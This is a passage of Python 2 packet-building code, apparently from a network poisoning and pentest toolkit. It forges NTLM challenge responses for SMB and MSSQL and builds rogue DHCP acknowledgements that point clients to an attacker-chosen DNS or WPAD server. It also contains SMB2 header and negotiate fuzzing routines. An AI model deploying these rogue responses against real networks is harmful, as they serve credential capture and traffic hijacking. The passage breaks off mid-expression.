("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NTLMSSPNtWorkstationName", "SMB3"),
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "SMB5"),
("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "WIN-PRH502RQAFV"),
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr",
"WIN-PRH502RQAFV.SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "SMB5.local"),
("NTLMSSPNTLMChallengeAVPairs7Id", "\x07\x00"),
("NTLMSSPNTLMChallengeAVPairs7Len", "\x08\x00"),
("NTLMSSPNTLMChallengeAVPairs7UnicodeStr", NTStamp(datetime.now())),
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
])
def calculate(self):
###### Convert strings to Unicode
self.fields["NTLMSSPNtWorkstationName"] = self.fields[
"NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
#Packet struct calc:
StructLen = str(self.fields["Len"]) + str(
self.fields["SessionFlag"]) + str(
self.fields["SecBlobOffSet"]) + str(self.fields["SecBlobLen"])
###### SecBlobLen Calc:
CalculateSecBlob = str(self.fields["NTLMSSPSignature"]) + str(
self.fields["NTLMSSPSignatureNull"]
) + str(self.fields["NTLMSSPMessageType"]) + str(
self.fields["NTLMSSPNtWorkstationLen"]
) + str(self.fields["NTLMSSPNtWorkstationMaxLen"]) + str(
self.fields["NTLMSSPNtWorkstationBuffOffset"]
) + str(self.fields["NTLMSSPNtNegotiateFlags"]) + str(
self.fields["NTLMSSPNtServerChallenge"]
) + str(self.fields["NTLMSSPNtReserved"]) + str(
self.fields["NTLMSSPNtTargetInfoLen"]) + str(
self.fields["NTLMSSPNtTargetInfoMaxLen"]) + str(
self.fields["NTLMSSPNtTargetInfoBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]
) + str(self.fields["NTLMSSPNtWorkstationName"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsId"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsLen"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs7Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs7Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
AsnLen = str(self.fields["ChoiceTagASNId"]) + str(
self.fields["ChoiceTagASNLenOfLen"]
) + str(self.fields["ChoiceTagASNIdLen"]) + str(
self.fields["NegTokenTagASNId"]
) + str(self.fields["NegTokenTagASNLenOfLen"]) + str(
self.fields["NegTokenTagASNIdLen"]
) + str(self.fields["Tag0ASNId"]) + str(
self.fields["Tag0ASNIdLen"]) + str(
self.fields["NegoStateASNId"]) + str(
self.fields["NegoStateASNLen"]) + str(
self.fields["NegoStateASNValue"]) + str(
self.fields["Tag1ASNId"]) + str(
self.fields["Tag1ASNIdLen"]) + str(
self.fields["Tag1ASNId2"]) + str(
self.fields["Tag1ASNId2Len"]) + str(
self.fields["Tag1ASNId2Str"]
) + str(self.fields["Tag2ASNId"]) + str(
self.fields["Tag2ASNIdLenOfLen"]
) + str(
self.fields["Tag2ASNIdLen"]
) + str(
self.fields["Tag3ASNId"]
) + str(
self.fields["Tag3ASNIdLenOfLen"]
) + str(self.fields["Tag3ASNIdLen"])
#Packet Struct len
self.fields["SecBlobLen"] = struct.pack("<H",
len(AsnLen + CalculateSecBlob))
self.fields["SecBlobOffSet"] = struct.pack("<h", len(StructLen) + 64)
###### ASN Stuff
if len(CalculateSecBlob) > 255:
self.fields["Tag3ASNIdLen"] = struct.pack(">H",
len(CalculateSecBlob))
else:
self.fields["Tag3ASNIdLenOfLen"] = "\x81"
self.fields["Tag3ASNIdLen"] = struct.pack(">B",
len(CalculateSecBlob))
if len(AsnLen + CalculateSecBlob) - 3 > 255:
self.fields["ChoiceTagASNIdLen"] = struct.pack(
">H",
len(AsnLen + CalculateSecBlob) - 4)
else:
self.fields["ChoiceTagASNLenOfLen"] = "\x81"
self.fields["ChoiceTagASNIdLen"] = struct.pack(
">B",
len(AsnLen + CalculateSecBlob) - 3)
if len(AsnLen + CalculateSecBlob) - 7 > 255:
self.fields["NegTokenTagASNIdLen"] = struct.pack(
">H",
len(AsnLen + CalculateSecBlob) - 8)
else:
self.fields["NegTokenTagASNLenOfLen"] = "\x81"
self.fields["NegTokenTagASNIdLen"] = struct.pack(
">B",
len(AsnLen + CalculateSecBlob) - 7)
tag2length = CalculateSecBlob + str(self.fields["Tag3ASNId"]) + str(
self.fields["Tag3ASNIdLenOfLen"]) + str(
self.fields["Tag3ASNIdLen"])
if len(tag2length) > 255:
self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length))
else:
self.fields["Tag2ASNIdLenOfLen"] = "\x81"
self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length))
self.fields["Tag1ASNIdLen"] = struct.pack(
">B",
len(
str(self.fields["Tag1ASNId2"]) +
str(self.fields["Tag1ASNId2Len"]) +
str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag1ASNId2Len"] = struct.pack(
">B", len(str(self.fields["Tag1ASNId2Str"])))
###### Workstation Offset
CalculateOffsetWorkstation = str(
self.fields["NTLMSSPSignature"]
) + str(self.fields["NTLMSSPSignatureNull"]) + str(
self.fields["NTLMSSPMessageType"]
) + str(self.fields["NTLMSSPNtWorkstationLen"]) + str(
self.fields["NTLMSSPNtWorkstationMaxLen"]
) + str(self.fields["NTLMSSPNtWorkstationBuffOffset"]) + str(
self.fields["NTLMSSPNtNegotiateFlags"]
) + str(self.fields["NTLMSSPNtServerChallenge"]) + str(
self.fields["NTLMSSPNtReserved"]) + str(
self.fields["NTLMSSPNtTargetInfoLen"]) + str(
self.fields["NTLMSSPNtTargetInfoMaxLen"]
) + str(
self.fields["NTLMSSPNtTargetInfoBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(
self.fields["NTLMSSPNTLMChallengeAVPairsId"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]) + (
self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs7Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs7Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack(
"<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack(
"<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack(
"<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### Target Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack(
"<i",
len(CalculateOffsetWorkstation +
str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack(
"<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack(
"<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class IMAPCapability(Packet):
fields = OrderedDict([
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
("CRLF", "\r\n"),
])
class IMAPCapabilityEnd(Packet):
fields = OrderedDict([
("Tag", ""),
("Message", " OK CAPABILITY completed."),
("CRLF", "\r\n"),
])
class SMBTransRAPData(Packet):
fields = OrderedDict([
("Wordcount", "\x0e"),
("TotalParamCount", "\x24\x00"),
("TotalDataCount", "\x00\x00"),
("MaxParamCount", "\x08\x00"),
("MaxDataCount", "\xff\xff"),
("MaxSetupCount", "\x00"),
("Reserved", "\x00\x00"),
("Flags", "\x00"),
("Timeout", "\x00\x00\x00\x00"),
("Reserved1", "\x00\x00"),
("ParamCount", "\x24\x00"),
("ParamOffset", "\x5a\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x7e\x00"),
("SetupCount", "\x00"),
("Reserved2", "\x00"),
("Bcc", "\x3f\x00"),
("Terminator", "\x00"),
("PipeName", "\\PIPE\\LANMAN"),
("PipeTerminator", "\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"])) % 2 == 0:
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["PipeTerminator"] = "\x00\x00\x00"
##Convert Path to Unicode first before any Len calc.
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
##Data Len
self.fields["TotalParamCount"] = struct.pack(
"<i", len(str(self.fields["Data"])))[:2]
self.fields["ParamCount"] = struct.pack("<i",
len(str(
self.fields["Data"])))[:2]
##Packet len
FindRAPOffset = str(self.fields["Wordcount"]) + str(
self.fields["TotalParamCount"]
) + str(self.fields["TotalDataCount"]) + str(
self.fields["MaxParamCount"]
) + str(self.fields["MaxDataCount"]) + str(
self.fields["MaxSetupCount"]
) + str(self.fields["Reserved"]) + str(self.fields["Flags"]) + str(
self.fields["Timeout"]) + str(self.fields["Reserved1"]) + str(
self.fields["ParamCount"]) + str(
self.fields["ParamOffset"]) + str(
self.fields["DataCount"]) + str(
self.fields["DataOffset"]) + str(
self.fields["SetupCount"]) + str(
self.fields["Reserved2"]) + str(
self.fields["Bcc"]) + str(
self.fields["Terminator"]) + str(
self.fields["PipeName"]) + str(
self.
fields["PipeTerminator"])
self.fields["ParamOffset"] = struct.pack("<i",
len(FindRAPOffset) + 32)[:2]
##Bcc Buff Len
BccComplete = str(self.fields["Terminator"]) + str(
self.fields["PipeName"]) + str(
self.fields["PipeTerminator"]) + str(self.fields["Data"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class IMAPGreating(Packet):
fields = OrderedDict([
("Code", "* OK IMAP4 service is ready."),
("CRLF", "\r\n"),
])
class SMBv2Header(Packet):
fields = OrderedDict([
("PreServer", "\xfe"),
("Server", "\x53\x4d\x42"),
("HeadLen", "\x40\x00"),
("CreditCharge", "\x00\x00"),
("NTStatus", "\x00\x00\x00\x00"),
("SMBv2Command", "\x00\x00"),
("CreditRequested", "\x00\x00"),
("Flags", "\x00\x00\x00\x00"),
("ChainOffset", "\x00\x00\x00\x00"),
("CommandSequence", "\x01\x00\x00\x00\x00\x00\x00\x00"),
("ProcessID", "\xff\xfe\x00\x00"),
("TreeID", "\x00\x00\x00\x00"),
("SessionID", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Signature",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
("Data", ""),
])
def calculateFuzz(self, n=1):
fuzz = fuzzer()
function = [
{
"HeadLen": fuzz.DispatchPackets(self.fields["HeadLen"])
},
]
for i in range(n):
result = choice(function)
self.fields.update(result)
print "CalculateFuzz updated this len in SMBv2Header:", result #Here we print what we actually altered, pretty useful when you get a crash.
def PreFuzz(self, n=1):
fuzz = fuzzer()
function = [
{
"PreServer": fuzz.DispatchPackets(self.fields["PreServer"])
},
{
"Server": fuzz.DispatchPackets(self.fields["Server"])
},
{
"SMBv2Command":
fuzz.DispatchPackets(self.fields["SMBv2Command"])
},
{
"CreditRequested":
fuzz.DispatchPackets(self.fields["CreditRequested"])
},
{
"Flags": fuzz.DispatchPackets(self.fields["Flags"])
},
{
"ChainOffset": fuzz.DispatchPackets(self.fields["ChainOffset"])
},
{
"CommandSequence":
fuzz.DispatchPackets(self.fields["CommandSequence"])
},
{
"ProcessID": fuzz.DispatchPackets(self.fields["ProcessID"])
},
{
"TreeID": fuzz.DispatchPackets(self.fields["TreeID"])
},
{
"SessionID": fuzz.DispatchPackets(self.fields["SessionID"])
},
{
"Data": fuzz.DispatchPackets(self.fields["Data"])
},
]
for i in range(n):
result = choice(function)
self.fields.update(result)
print "Pre Fuzz updated this field in SMB2 Header:", result
class SMB2Nego(Packet):
fields = OrderedDict([
("Len", "\x24\x00"),
("DialectCount", "\x05\x00"),
("SecurityMode", "\x01"),
("NullTerminator", "\x00\x00\x00"),
("Capabilities", "\x7f\x00\x00\x00"),
("ClientGUID", os.urandom(16)),
("NegoContextOffset", "\x70\x00\x00\x00"),
("NegoContextCount", "\x04\x00"),
("Reserved", "\x00\x00"),
("Dialects", "\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03"),
("Separator", "\x00\x00"),
("Context1Type", "\x01\x00"),
("Context1Len", "\x26\x00"),
("Context1Reserved", "\x00\x00\x00\x00"),
("Context1HashAlgoCount", "\x01\x00"),
("Context1SaltLen", "\x20\x00"),
("Context1HashAlgoType", "\x01\x00"),
("Context1Salt",
"\x9d\x17\xd8\x0d\x2f\x57\xf1\xcd\x25\xbe\xb0\xac\x09\x6f\xab\x44\xa3\x79\x04\x88\x51\x22\xc4\xc1\xef\xc4\x65\xae\xd7\xe1\x6f\x98"
),
("Separator2", "\x00\x00"),
("Context2Type", "\x02\x00"),
("Context2Len", "\x06\x00"),
("Context2Reserved", "\x00\x00\x00\x00"),
("Context2CipherCount", "\x02\x00"),
("Context2Cipher1", "\x02\x00"),
("Context2Cipher2", "\x01\x00"),
("Separator4", "\x00\x00"),
("Context4Type", "\x03\x00"),
("Context4Len", "\x0e\x00"),
("Context4Reserved", "\x00\x00\x00\x00"),
("Context4Data",
"\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00"),
("Separator3", "\x00\x00"),
("Context3Type", "\x05\x00"),
("Context3Len", "\x1a\x00"),
("Context3Reserved", "\x00\x00\x00\x00"),
("Context3NetName", "192.168.0.176"), #your IP.
(
"Data", ""
), # We can add this field at the end of the packet so we're able to add some fuzzed data at the end of the packet and have all the lenghts correct.
])
def calculate(self):
self.fields["NegoContextOffset"] = struct.pack(
"<L",
len(self.fields["NegoContextCount"] + self.fields["Reserved"] +
self.fields["Dialects"] + self.fields["Separator"]) +
96) # Context offset.
self.fields["Context3NetName"] = self.fields["Context3NetName"].encode(
'utf-16le')
self.fields["Context3Len"] = struct.pack(
"<H", len(str(self.fields["Context3NetName"])))
self.fields["Context4Len"] = struct.pack(
"<H", len(str(self.fields["Context4Data"])))
####
self.fields["Context1SaltLen"] = struct.pack(
"<H", len(str(self.fields["Context1Salt"])))
Context1DataLen = str(self.fields["Context1HashAlgoCount"]) + str(
self.fields["Context1SaltLen"]) + str(
self.fields["Context1HashAlgoType"]) + str(
self.fields["Context1Salt"])
self.fields["Context1Len"] = struct.pack("<H", len(Context1DataLen))
Context2Len = str(self.fields["Context2CipherCount"]) + str(
self.fields["Context2Cipher1"]) + str(
self.fields["Context2Cipher2"])
self.fields["Context2Len"] = struct.pack("<H", len(Context2Len))
####DialectCount....
self.fields["DialectCount"] = struct.pack(
"<H",
len(str(self.fields["Dialects"])) / 2)
def calculateFuzz(self, n=1):
#Here we only fuzz length fields after the right calculation.
fuzz = fuzzer()
function = [
{
"NegoContextOffset":
fuzz.DispatchPackets(self.fields["NegoContextOffset"])
},
{
"NegoContextCount":
fuzz.DispatchPackets(self.fields["NegoContextCount"])
},
{
"DialectCount":
fuzz.DispatchPackets(self.fields["DialectCount"])
},
{
"Context1Len": fuzz.DispatchPackets(self.fields["Context1Len"])
},
{
"Context1SaltLen":
fuzz.DispatchPackets(self.fields["Context1SaltLen"])
},
{
"Context2CipherCount":
fuzz.DispatchPackets(self.fields["Context2CipherCount"])
},
{
"Context2Len": fuzz.DispatchPackets(self.fields["Context2Len"])
},
{
"Context3Len": fuzz.DispatchPackets(self.fields["Context3Len"])
},
{
"Context4Len": fuzz.DispatchPackets(self.fields["Context4Len"])
},
]
for i in range(n):
result = choice(function)
self.fields.update(result)
print "CalculateFuzz updated this len in Nego Data:", result
def PreFuzz(self, n=1):
fuzz = fuzzer()
function = [
#{"Len": fuzz.DispatchPackets(self.fields["Len"])}, # in SMB2, fuzzing this len is irrelevant, just like wordcount in smbv1.
#{"DialectCount": fuzz.DispatchPackets(self.fields["DialectCount"])}, #Already fuzzed in calculateFuzz()
{
"SecurityMode":
fuzz.DispatchPackets(self.fields["SecurityMode"])
},
{
"Capabilities":
fuzz.DispatchPackets(self.fields["Capabilities"])
},
#{"Reserved": fuzz.DispatchPackets(self.fields["Reserved"])},
{
"Dialects": fuzz.DispatchPackets(self.fields["Dialects"])
},
{
"Separator": fuzz.DispatchPackets(self.fields["Separator"])
},
{
"Context1Type":
fuzz.DispatchPackets(self.fields["Context1Type"])
},
{
"Context1Reserved":
fuzz.DispatchPackets(self.fields["Context1Reserved"])
},
{
"Context1HashAlgoCount":
fuzz.DispatchPackets(self.fields["Context1HashAlgoCount"])
},
{
"Context1HashAlgoType":
fuzz.DispatchPackets(self.fields["Context1HashAlgoType"])
},
{
"Context1Salt":
fuzz.DispatchPackets(self.fields["Context1Salt"])
},
{
"Separator2": fuzz.DispatchPackets(self.fields["Separator2"])
},
{
"Context2Type":
fuzz.DispatchPackets(self.fields["Context2Type"])
},
{
"Context2Reserved":
fuzz.DispatchPackets(self.fields["Context2Reserved"])
},
{
"Context2CipherCount":
fuzz.DispatchPackets(self.fields["Context2CipherCount"])
},
{
"Context2Cipher1":
fuzz.DispatchPackets(self.fields["Context2Cipher1"])
},
{
"Context2Cipher2":
fuzz.DispatchPackets(self.fields["Context2Cipher2"])
},
{
"Context4Data":
fuzz.DispatchPackets(self.fields["Context4Data"])
},
{
"Context3NetName":
fuzz.DispatchPackets(self.fields["Context3NetName"])
},
{
"Data": fuzz.DispatchPackets(self.fields["Data"])
},
]
for i in range(n):
result = choice(function)
self.fields.update(result)
print "Pre Fuzz updated this field in SMB2 Nego Data:", result
class DHCPACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" * 10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("DHCPCode", "\x35"), #DHCP Message
("DHCPCodeLen", "\x01"),
("DHCPOpCode", "\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op51", "\x33"),
("Op51Len", "\x04"),
("Op51Str", "\x00\x00\x00\x0a"), #Lease time
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", ""),
("Op252Len", ""),
("Op252Str", ""), #Wpad Server
("Op255", "\xff"),
("Padding", "\x00"),
])
def calculate(self, DHCP_DNS):
self.fields["Op54Str"] = socket.inet_aton(ROUTERIP).decode('latin-1')
self.fields["Op1Str"] = socket.inet_aton(NETMASK).decode('latin-1')
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP).decode('latin-1')
self.fields["Op6Str"] = socket.inet_aton(DNSIP).decode(
'latin-1') + socket.inet_aton(DNSIP2).decode('latin-1')
self.fields["Op15Str"] = DNSNAME
if DHCP_DNS:
self.fields["Op6Str"] = socket.inet_aton(RespondWithIP()).decode(
'latin-1') + socket.inet_aton(DNSIP2).decode('latin-1')
else:
self.fields["Op252"] = "\xfc"
self.fields["Op252Str"] = WPADSRV
self.fields["Op252Len"] = StructWithLenPython2or3(
">b", len(str(self.fields["Op252Str"])))
self.fields["Op51Str"] = StructWithLenPython2or3(
'>L', random.randrange(10, 20))
self.fields["Op15Len"] = StructWithLenPython2or3(
">b", len(str(self.fields["Op15Str"])))
class MSSQLNTLMChallengeAnswer(Packet):
fields = OrderedDict([
("PacketType", "\x04"),
("Status", "\x01"),
("Len", "\x00\xc7"),
("SPID", "\x00\x00"),
("PacketID", "\x01"),
("Window", "\x00"),
("TokenType", "\xed"),
("SSPIBuffLen", "\xbc\x00"),
("Signature", "NTLMSSP"),
("SignatureNull", "\x00"),
("MessageType", "\x02\x00\x00\x00"),
("TargetNameLen", "\x06\x00"),
("TargetNameMaxLen", "\x06\x00"),
("TargetNameOffset", "\x38\x00\x00\x00"),
("NegoFlags", "\x05\x02\x89\xa2"),
("ServerChallenge", ""),
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("TargetInfoLen", "\x7e\x00"),
("TargetInfoMaxLen", "\x7e\x00"),
("TargetInfoOffset", "\x3e\x00\x00\x00"),
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
("TargetNameStr", "SMB"),
("Av1", "\x02\x00"), #nbt name
("Av1Len", "\x06\x00"),
("Av1Str", "SMB"),
("Av2", "\x01\x00"), #Server name
("Av2Len", "\x14\x00"),
("Av2Str", "SMB-TOOLKIT"),
("Av3", "\x04\x00"), #Full Domain name
("Av3Len", "\x12\x00"),
("Av3Str", "smb.local"),
("Av4", "\x03\x00"), #Full machine domain name
("Av4Len", "\x28\x00"),
("Av4Str", "server2003.smb.local"),
("Av5", "\x05\x00"), #Domain Forest Name
("Av5Len", "\x12\x00"),
("Av5Str", "smb.local"),
("Av6", "\x00\x00"), #AvPairs Terminator
("Av6Len", "\x00\x00"),
])
def calculate(self):
##First convert to uni
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode(
'utf-16le')
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
##Then calculate
CalculateCompletePacket = str(self.fields["PacketType"]) + str(
self.fields["Status"]
) + str(self.fields["Len"]) + str(self.fields["SPID"]) + str(
self.fields["PacketID"]
) + str(self.fields["Window"]) + str(self.fields["TokenType"]) + str(
self.fields["SSPIBuffLen"]) + str(self.fields["Signature"]) + str(
self.fields["SignatureNull"]) + str(
self.fields["MessageType"]) + str(
self.fields["TargetNameLen"]) + str(
self.fields["TargetNameMaxLen"]) + str(
self.fields["TargetNameOffset"]) + str(
self.fields["NegoFlags"]) + str(
self.fields["ServerChallenge"]) + str(
self.fields["Reserved"]) + str(
self.fields["TargetInfoLen"]
) + str(
self.fields["TargetInfoMaxLen"]
) + str(
self.fields["TargetInfoOffset"]
) + str(
self.fields["NTLMOsVersion"]
) + str(
self.fields["TargetNameStr"]
) + str(self.fields["Av1"]) + str(
self.fields["Av1Len"]) + str(
self.fields["Av1Str"]
) + str(
self.fields["Av2"]) + str(
self.fields["Av2Len"]
) + str(
self.fields["Av2Str"]
) + str(
self.fields["Av3"]
) + str(
self.fields["Av3Len"]
) + str(
self.fields["Av3Str"]
) + str(
self.fields["Av4"]
) + str(
self.fields["Av4Len"]
) + str(
self.fields["Av4Str"]
) + str(
self.fields["Av5"]
) + str(
self.fields["Av5Len"]
) + str(
self.fields["Av5Str"]
) + str(
self.fields["Av6"]
) + str(
self.fields["Av6Len"])
CalculateSSPI = str(self.fields["Signature"]) + str(
self.fields["SignatureNull"]
) + str(self.fields["MessageType"]) + str(
self.fields["TargetNameLen"]
) + str(self.fields["TargetNameMaxLen"]) + str(
self.fields["TargetNameOffset"]
) + str(self.fields["NegoFlags"]) + str(
self.fields["ServerChallenge"]) + str(
self.fields["Reserved"]) + str(
self.fields["TargetInfoLen"]) + str(
self.fields["TargetInfoMaxLen"]) + str(
self.fields["TargetInfoOffset"]) + str(
self.fields["NTLMOsVersion"]) + str(
self.fields["TargetNameStr"]) + str(
self.fields["Av1"]) + str(
self.fields["Av1Len"]) + str(
self.fields["Av1Str"]) + str(
self.fields["Av2"]) + str(
self.fields["Av2Len"]
) + str(
self.fields["Av2Str"]
) + str(
self.fields["Av3"]
) + str(
self.fields["Av3Len"]
) + str(
self.fields["Av3Str"]
) + str(
self.fields["Av4"]
) + str(
self.fields["Av4Len"]
) + str(
self.fields["Av4Str"]
) + str(
self.fields["Av5"]
) + str(
